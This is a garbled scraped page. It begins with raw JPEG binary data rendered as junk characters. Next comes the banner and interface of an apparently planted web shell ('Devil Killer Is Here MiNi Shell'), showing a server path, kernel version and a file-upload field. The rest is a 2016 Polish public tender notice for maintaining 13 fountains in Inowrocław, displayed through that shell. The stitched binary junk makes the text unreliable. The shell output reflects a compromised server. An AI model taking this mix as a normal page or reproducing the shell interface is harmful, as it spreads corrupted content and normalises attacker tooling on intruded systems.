JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160323/30309-N-2016.html

<p class="kh_header"><b>Inowrocław: Obsługa i konserwacja fontann oraz utrzymanie ich w należytym stanie technicznym i czystościowym na terenie Miasta Inowrocławia w 2016 r.</b><br>
<b>Numer ogłoszenia: 30309 - 2016; data zamieszczenia: 23.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Sp. z o.o. , ul. ks. Piotra Wawrzyniaka 33, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 052 3573454, faks 051 3564305.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgkimino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o. o. - własność samorządowa, zarządzanie nieruchomościami.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa i konserwacja fontann oraz utrzymanie ich w należytym stanie technicznym i czystościowym na terenie Miasta Inowrocławia w 2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia  jest:  obsługa  i  konserwacja  13 fontann  oraz  utrzymanie  ich w należytym stanie technicznym i czystościowym na terenie Miasta Inowrocławia. 
Zamówienie zostało podzielone 2 części z możliwością składania ofert częściowych w tym:
Część I - Bieżąca obsługa i konserwacja 12 fontann na terenie Miasta Inowrocławia - zadanie   polega   na   wiosennym   rozruchu   oraz   na   utrzymaniu  sprawności  technicznej i należytego  stanu  porządkowego  12  fontann  zlokalizowanych  na  terenie  Miasta  Inowrocławia, w okresie od 15 kwietnia 2016 r. do 15 października 2016 r. 
1.1. Zakres prac: 
a) przygotowanie i przeprowadzenie wiosennego rozruchu instalacji fontann (nie wcześniej niż 15 kwietnia jednak nie później niż 1 maja br.), przy czym zamawiający zastrzega sobie możliwość zmiany terminu załączenia poszczególnych obiektów (zlecenie faksem),
b) utrzymanie w sprawności technicznej, urządzeń fontann, tj.: pompy, filtry, urządzenia kontrolno - pomiarowe do kontroli i sterowania parametrami chemicznymi, dysze wodne i rurociągi fontanny, urządzenia sterujące i zasilania elektrycznego, spusty i wpusty wody niecki fontanny,
c) wyłączenie wszystkich fontann z terenu Miasta Inowrocławia oraz przegląd techniczny, konserwacja i zabezpieczenia urządzeń, jak również wszelkich systemów wodnych na okres zimowy, przez co rozumieć należy wypompowanie wody ze zbiorników i instalacji, przed wystąpieniem niesprzyjających warunków atmosferycznych - mrozy, jednakże nie później niż do dnia 15 października, przy czym zamawiający zastrzega sobie możliwość zmiany terminu wyłączenia poszczególnych obiektów (zlecenie faksem),
d) protokolarne przekazanie i zdeponowanie na okres zimowy zdemontowanych elementów fontann na terenie Przedsiębiorstwa Gospodarki Komunalnej i Mieszkaniowej sp. z o.o.,
e) włączanie i wyłączanie fontann w godzinach od 8.30 do 23.00 - utrzymanie sprawności systemu włączeń/wyłączeń, przy czym zastrzega się możliwość zmiany czasu pracy poszczególnych obiektów (zlecenie faksem),
f) utrzymanie w należytym stanie technicznym urządzeń towarzyszących, takich jak: instalacje zasilania fontanny w wodę, instalacje kanalizacji deszczowej i kanalizacji ogólnospławnej; zasilania energetycznego oraz systemu podświetlania fontann,
g) bieżące oczyszczanie filtrów, koszy ssących pomp, jak również dysz i zaworów,
h) wymiana wody w zbiornikach - na zlecenie zamawiającego (minimum 1x w sezonie);
i) codzienną kontrolę prawidłowości działania i stanu czystości fontann, jak również usuwanie wszelkich nieprawidłowości w funkcjonowaniu obiektów, przez co rozumieć należy likwidowanie skutków awarii oraz zniszczeń urządzeń wchodzących w skład fontann,
j) kontrolę, dozowanie i zapewnienie we własnym zakresie wszystkich środków chemicznych niezbędnych do utrzymania parametrów wody na właściwym poziomie (fontanna na Skwerze Obrońców Inowrocławia oraz na terenie Parku Solankowego przy muszli koncertowej),
k) wybieranie kamieni z oczka wodnego i dolewanie wody minimum 2x w sezonie - fontanna na terenie Skweru Leona Wyczółkowskiego,
l) prace konserwacyjne na niecce fontann tj. malowanie, uzupełnianie ubytków,
ł) konserwację włazów i elementów wentylacyjnych,
m) w razie konieczności przeprowadzenie drobnych napraw, malowanie, uzupełnianie ubytków, zaprawy murarskiej, likwidacji skutków działania wandali,
n) dokonywanie odczytów na wodomierzu fontanny przy kościele św. Mikołaja w dniu pierwszego uruchomienia fontanny oraz po zakończeniu sezonu jesienią i informowanie pisemne zamawiającego o jego wskazaniu,
o) informowanie na bieżąco zamawiającego, inspektora nadzoru wyznaczonego przez zamawiającego    oraz    pracowników    Wydziału    Gospodarki    Komunalne,    Środowiska i Rolnictwa Urzędu Miasta Inowrocławia o zauważonych zmianach i uszkodzeniach, zainstalowanych  urządzeń  technicznych  fontann  oraz  konstrukcji  komory technologicznej i niecki fontann,
ó) wykonawca zobowiązany będzie do prowadzenia książek eksploatacji fontann - do wglądu pracowników Wydziału Gospodarki Komunalnej, Środowiska i Rolnictwa Urzędu Miasta Inowrocławia,
p) zapoznanie się z instrukcjami obsługi i eksploatacji poszczególnych urządzeń i warunkami gwarancji oraz współdziałanie z osobami upoważnionymi, pełniącymi nadzór,
r) konserwacja fontann lub ich elementów objętych okresem gwarancyjnym powinna uwzględniać prace wskazane w odpowiednich instrukcjach, które zostaną przekazane wykonawcy w dniu podpisania umowy. Za szkody spowodowane niedostosowaniem się do zapisów instrukcji odpowiada wykonawca,
s) w przypadku fontann lub ich elementów objętych okresem gwarancyjnym stwierdzenie przez wykonawcę wadliwego wykonania lub pojawienia się konieczności wykonania ewentualnych napraw zostanie niezwłocznie zgłoszone zamawiającemu (fontanna na stawie Kaula),
t) wykonawca zobowiązany jest każdorazowa zgłaszać zamawiającemu awarie oraz zniszczenia niezwłocznie po powzięciu wiadomości o tym fakcie,
u) zamawiający zastrzega sobie prawo do przeprowadzania niezapowiedzianego przeglądu technicznego obiektu przy udziale upoważnionego inspektora nadzoru,
w) bieżącą konserwację urządzeń i wyposażenia wykonawca będzie wykonywał zgodnie z instrukcjami.
Część II - Bieżąca obsługa i konserwacja fontanny na inowrocławskim Rynku - zadanie polega na wiosennym rozruchu oraz na utrzymaniu sprawności technicznej i  należytego   stanu   porządkowego  fontanny  zlokalizowanej  na  inowrocławskim  Rynku w  okresie  nie   wcześniej   niż  od  15  kwietnia  2016  r.  do 14 kwietnia 2017 r.  
1.2. Zakres prac:
a) przygotowanie i przeprowadzenie wiosennego rozruchu instalacji fontanny (nie wcześniej niż 15 kwietnia jednak nie później niż 1 maja br.), przy czym zamawiający zastrzega sobie możliwość zmiany terminu załączenia fontanny (zlecenie faksem),
b) utrzymanie w sprawności technicznej urządzeń fontann, tj.: pompy, filtry, urządzenia kontrolno - pomiarowe do kontroli i sterowania parametrami chemicznymi, dysze wodne i rurociągi fontanny, urządzenia sterujące i zasilania elektryczne,
c) wyłączenie fontanny oraz jej przegląd techniczny, konserwacja i zabezpieczenia urządzeń oraz wszelkich systemów wodnych na okres zimowy, przez co rozumieć należy wypompowanie wody ze zbiornika i instalacji, przed wystąpieniem niesprzyjających warunków atmosferycznych - mrozy, jednakże nie później niż do dnia 15 października br., przy czym zamawiający zastrzega sobie możliwość zmiany terminu wyłączenia obiektu (zlecenie faksem),
d) zapewnienie sprawności technicznej podświetlenia fontanny, konieczne wymiany i naprawy elementów świetlnych,
e) nadzór nad pracą obiektu w okresie jesienno-zimowym, tj. od momentu wyłączenia obiegu wody na okres zimowy do jej rozruchu wiosennego, przez co rozumieć należy kontrolę oświetlenia oraz kontrolę szczelności komory i innych elementów - 1 godzina 1 x w tygodniu, przy czym wszelkie prace dodatkowe, poprzedzone protokołem konieczności  zostaną zlecone przez zamawiającego,
f) włączanie i wyłączanie fontanny w godzinach od 8.30 do 23.00, przy czym zastrzega się możliwość zmiany czasu pracy obiektu (zlecenie faksem),
g) codzienna kontrola prawidłowości działania fontanny, w tym godzin odtwarzania muzyki (godz. 12.00, 17.30 i 21.30) i stanu jej czystości, jak również usuwanie wszelkich nieprawidłowości w funkcjonowaniu obiektu, przez co rozumieć należy likwidowanie skutków awarii oraz zniszczeń urządzeń wchodzących w jej skład,
h) utrzymanie w czystości fontanny oraz bieżące, gruntowne czyszczenie z osadów wapiennych i wytrąceń oraz glonów jej elementów i ozdobnych głazów przy użyciu środków do czyszczenia, czyszczenie obudów i lamp fontanny,
i) przestrzegania zachowania prawidłowych parametrów wody oraz zapewnienie we własnym zakresie wszystkich środków chemicznych niezbędnych do utrzymania parametrów wody na właściwym poziomie, przez co rozumieć należy:
- bieżącą kontrolę i utrzymywanie parametrów wody (pH 7,2-7,6 i chlor 0,3-0,4 mg/l) wg wytycznych dokumentacji, przy czym zamawiający zastrzega sobie prawo do przeprowadzania niezapowiedzianej kontroli parametrów wody przez wyznaczoną jednostkę; 
- stałe dozowanie środka glono-bójczego (np. algen),
- regularne uzupełnianie czynnika zmiękczającego,
j) prowadzenie kontroli i konserwacji zmiękczacza wody,
k) czyszczenie pre-filtrów ze szczególnym uwzględnieniem filtrów dokładnych,
l) czyszczenie zaworów dysz muzycznych i skaczących kulek,
ł) utrzymywanie czystości sond kontroli poziomu wody,
m) sprawdzanie drożności wentylacji komory i układu chłodzenia szaf zasilająco-sterujących (RZS),
n) kontrola sprawności działania pompy odwodnienia posadzki,
o) w związku z przeprowadzeniem w 2015 r. prac naprawczych i modernizacyjnych obiektu część elementów fontanny objętych jest gwarancją i w razie stwierdzenia konieczności wykonania ewentualnych napraw lub wadliwego wykonania wykonawca zobowiązany jest niezwłocznie poinformować zamawiającego,
ó) konserwacja elementów fontanny objętych okresem gwarancyjnym powinna uwzględniać prace wskazane w odpowiednich instrukcjach, które zostaną przekazane wykonawcy w dniu podpisania umowy. Za szkody spowodowane niedostosowaniem się do zapisów instrukcji odpowiada wykonawca,
p) wykonawca zobowiązany będzie do prowadzenia książki eksploatacji fontanny - do wglądu pracowników Wydziału Gospodarki Komunalnej, Środowiska i Rolnictwa Urzędu Miasta Inowrocławia, 
r) zamawiający zastrzega sobie prawo do przeprowadzania niezapowiedzianego przeglądu technicznego obiektu przy udziale upoważnionego inspektora nadzoru,
s) informowanie na bieżąco zamawiającego, inspektora nadzoru wyznaczonego przez zamawiającego    oraz    pracowników    Wydziału    Gospodarki   Komunalnej,   Środowiska i Rolnictwa Urzędu Miasta Inowrocławia o zauważonych zmianach i uszkodzeniach zainstalowanych  urządzeń  technicznych  fontanny  oraz konstrukcji komory technologicznej i niecki fontann,
t) zapoznanie się z instrukcjami obsługi i eksploatacji poszczególnych urządzeń i warunkami gwarancji oraz współdziałanie z osobami upoważnionymi, pełniącymi nadzór,
u) wykonawca zobowiązany jest każdorazowa zgłaszać zamawiającemu wszelkie awarie oraz zniszczenia niezwłocznie po powzięciu wiadomości o tym fakcie,
w) bieżącą konserwację urządzeń i wyposażenia wykonawca będzie wykonywał zgodnie z instrukcjami..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy Prawo zamówień publicznych. Będą one udzielone do wysokości 20 % zamówienia podstawowego na podstawie odrębnej umowy. W przypadku wykorzystania całej kwoty przeznaczonej na realizację zamówienia lub w przypadku zwiększonej liczby awaryjności fontann.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.04.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi  wykazać,  że  w okresie ostatnich 3 lat obsługiwał i eksploatował fontanny muzyczne lub multimedialne przez okres 6 miesięcy (ciągły) wyposażone w co najmniej 30 szt. dysz sterowanych w tym minimum 10 dysz z przerywaczami strumienia za pomocą elektrozaworu - dotyczy części I i II. Wymagane minimum 2 usługi plus 2 poświadczenia (referencje).  Zamawiający  stwierdzi  to  na podstawie, dołączonego do oferty wykazu wraz z załączeniem poświadczeń, że usługi te zostały wykonane lub są wykonywane należycie (wzór załącznik nr 6 do siwz). Poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. Zamawiający oceni wykonawcę na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca   musi   wykazać,   że   posiada   sprzęt   pływający   dla   obsługi  stawów  wraz z informacją o podstawie do dysponowania tymi zasobami. Wymagane minimum 1 łódź wiosłowa. Zamawiający stwierdzi to na podstawie, dołączonego do oferty wykazu (wzór załącznik nr 4 do siwz). Zamawiający oceni wykonawcę na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że do obsługi fontanny zlokalizowanej na płycie Rynku wyznaczy 2 przeszkolonych pod kątem jej obsługi pracowników - dotyczy części II. Zamawiający stwierdzi to na podstawie, dołączonego do oferty wykazu osób (wzór załącznik nr 7 do siwz). Zamawiający oceni wykonawcę na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że jest ubezpieczony od OC w zakresie prowadzonej działalności. Zamawiający stwierdzi to na podstawie dołączonej polisy. Do polisy należy załączyć dowód jej opłacenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularz ofertowy (zał. nr 1 do swiz), 
b) Oświadczenie w trybie art.22 ust.1 pkt.1-4 ustawy Pzp -wzór zał. nr 2 do siwz, 
c) Oświadczenie w trybie art.24 ustawy Pzp - wzór zał. nr 3 do siwz.
d) Wykaz usług - wzór zał. nr 4 do siwz,
e) Wykaz narzędzi - wzór zał. nr 5 do siwz,
f) Oświadczenie w trybie art.26 ustawy Pzp - wzór zał. nr 6 do siwz,
g) Wykaz osób - wzór zał. nr 7 do siwz.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Tak - zgodnie z siwz i ustawą Prawo zamówień publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pgkim-inowroclaw.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwa Gospodarki Komunalnej i Mieszkaniowej Sp. z o. o. w Inowrocławiu, ul. ks. P. Wawrzyniaka 33, 88-100 Inowrocław, do kont. Krystyna Glonek, tel./faks 52 35 64 304.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2016 godzina 09:50, miejsce: Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Sp. z o. o. w Inowrocławiu, ul. ks. P. Wawrzyniaka 33, 88-100 Inowrocław, sekretariat 1 piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający będzie żądał wniesienia zabezpieczenia należytego wykonania umowy, które będzie służyło pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.
2. Zabezpieczenie ustala się w wysokości 3 % od ceny całkowitej podanej w ofercie.
3. Zabezpieczenie może być wnoszone według wyboru wykonawcy w jednej lub w kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach  udzielanych  przez  podmiot,  o  którym  mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
4. Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy zamawiającego.
5. W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Bieżąca obsługa i konserwacja 12 fontann na terenie Miasta Inowrocławia.</p>
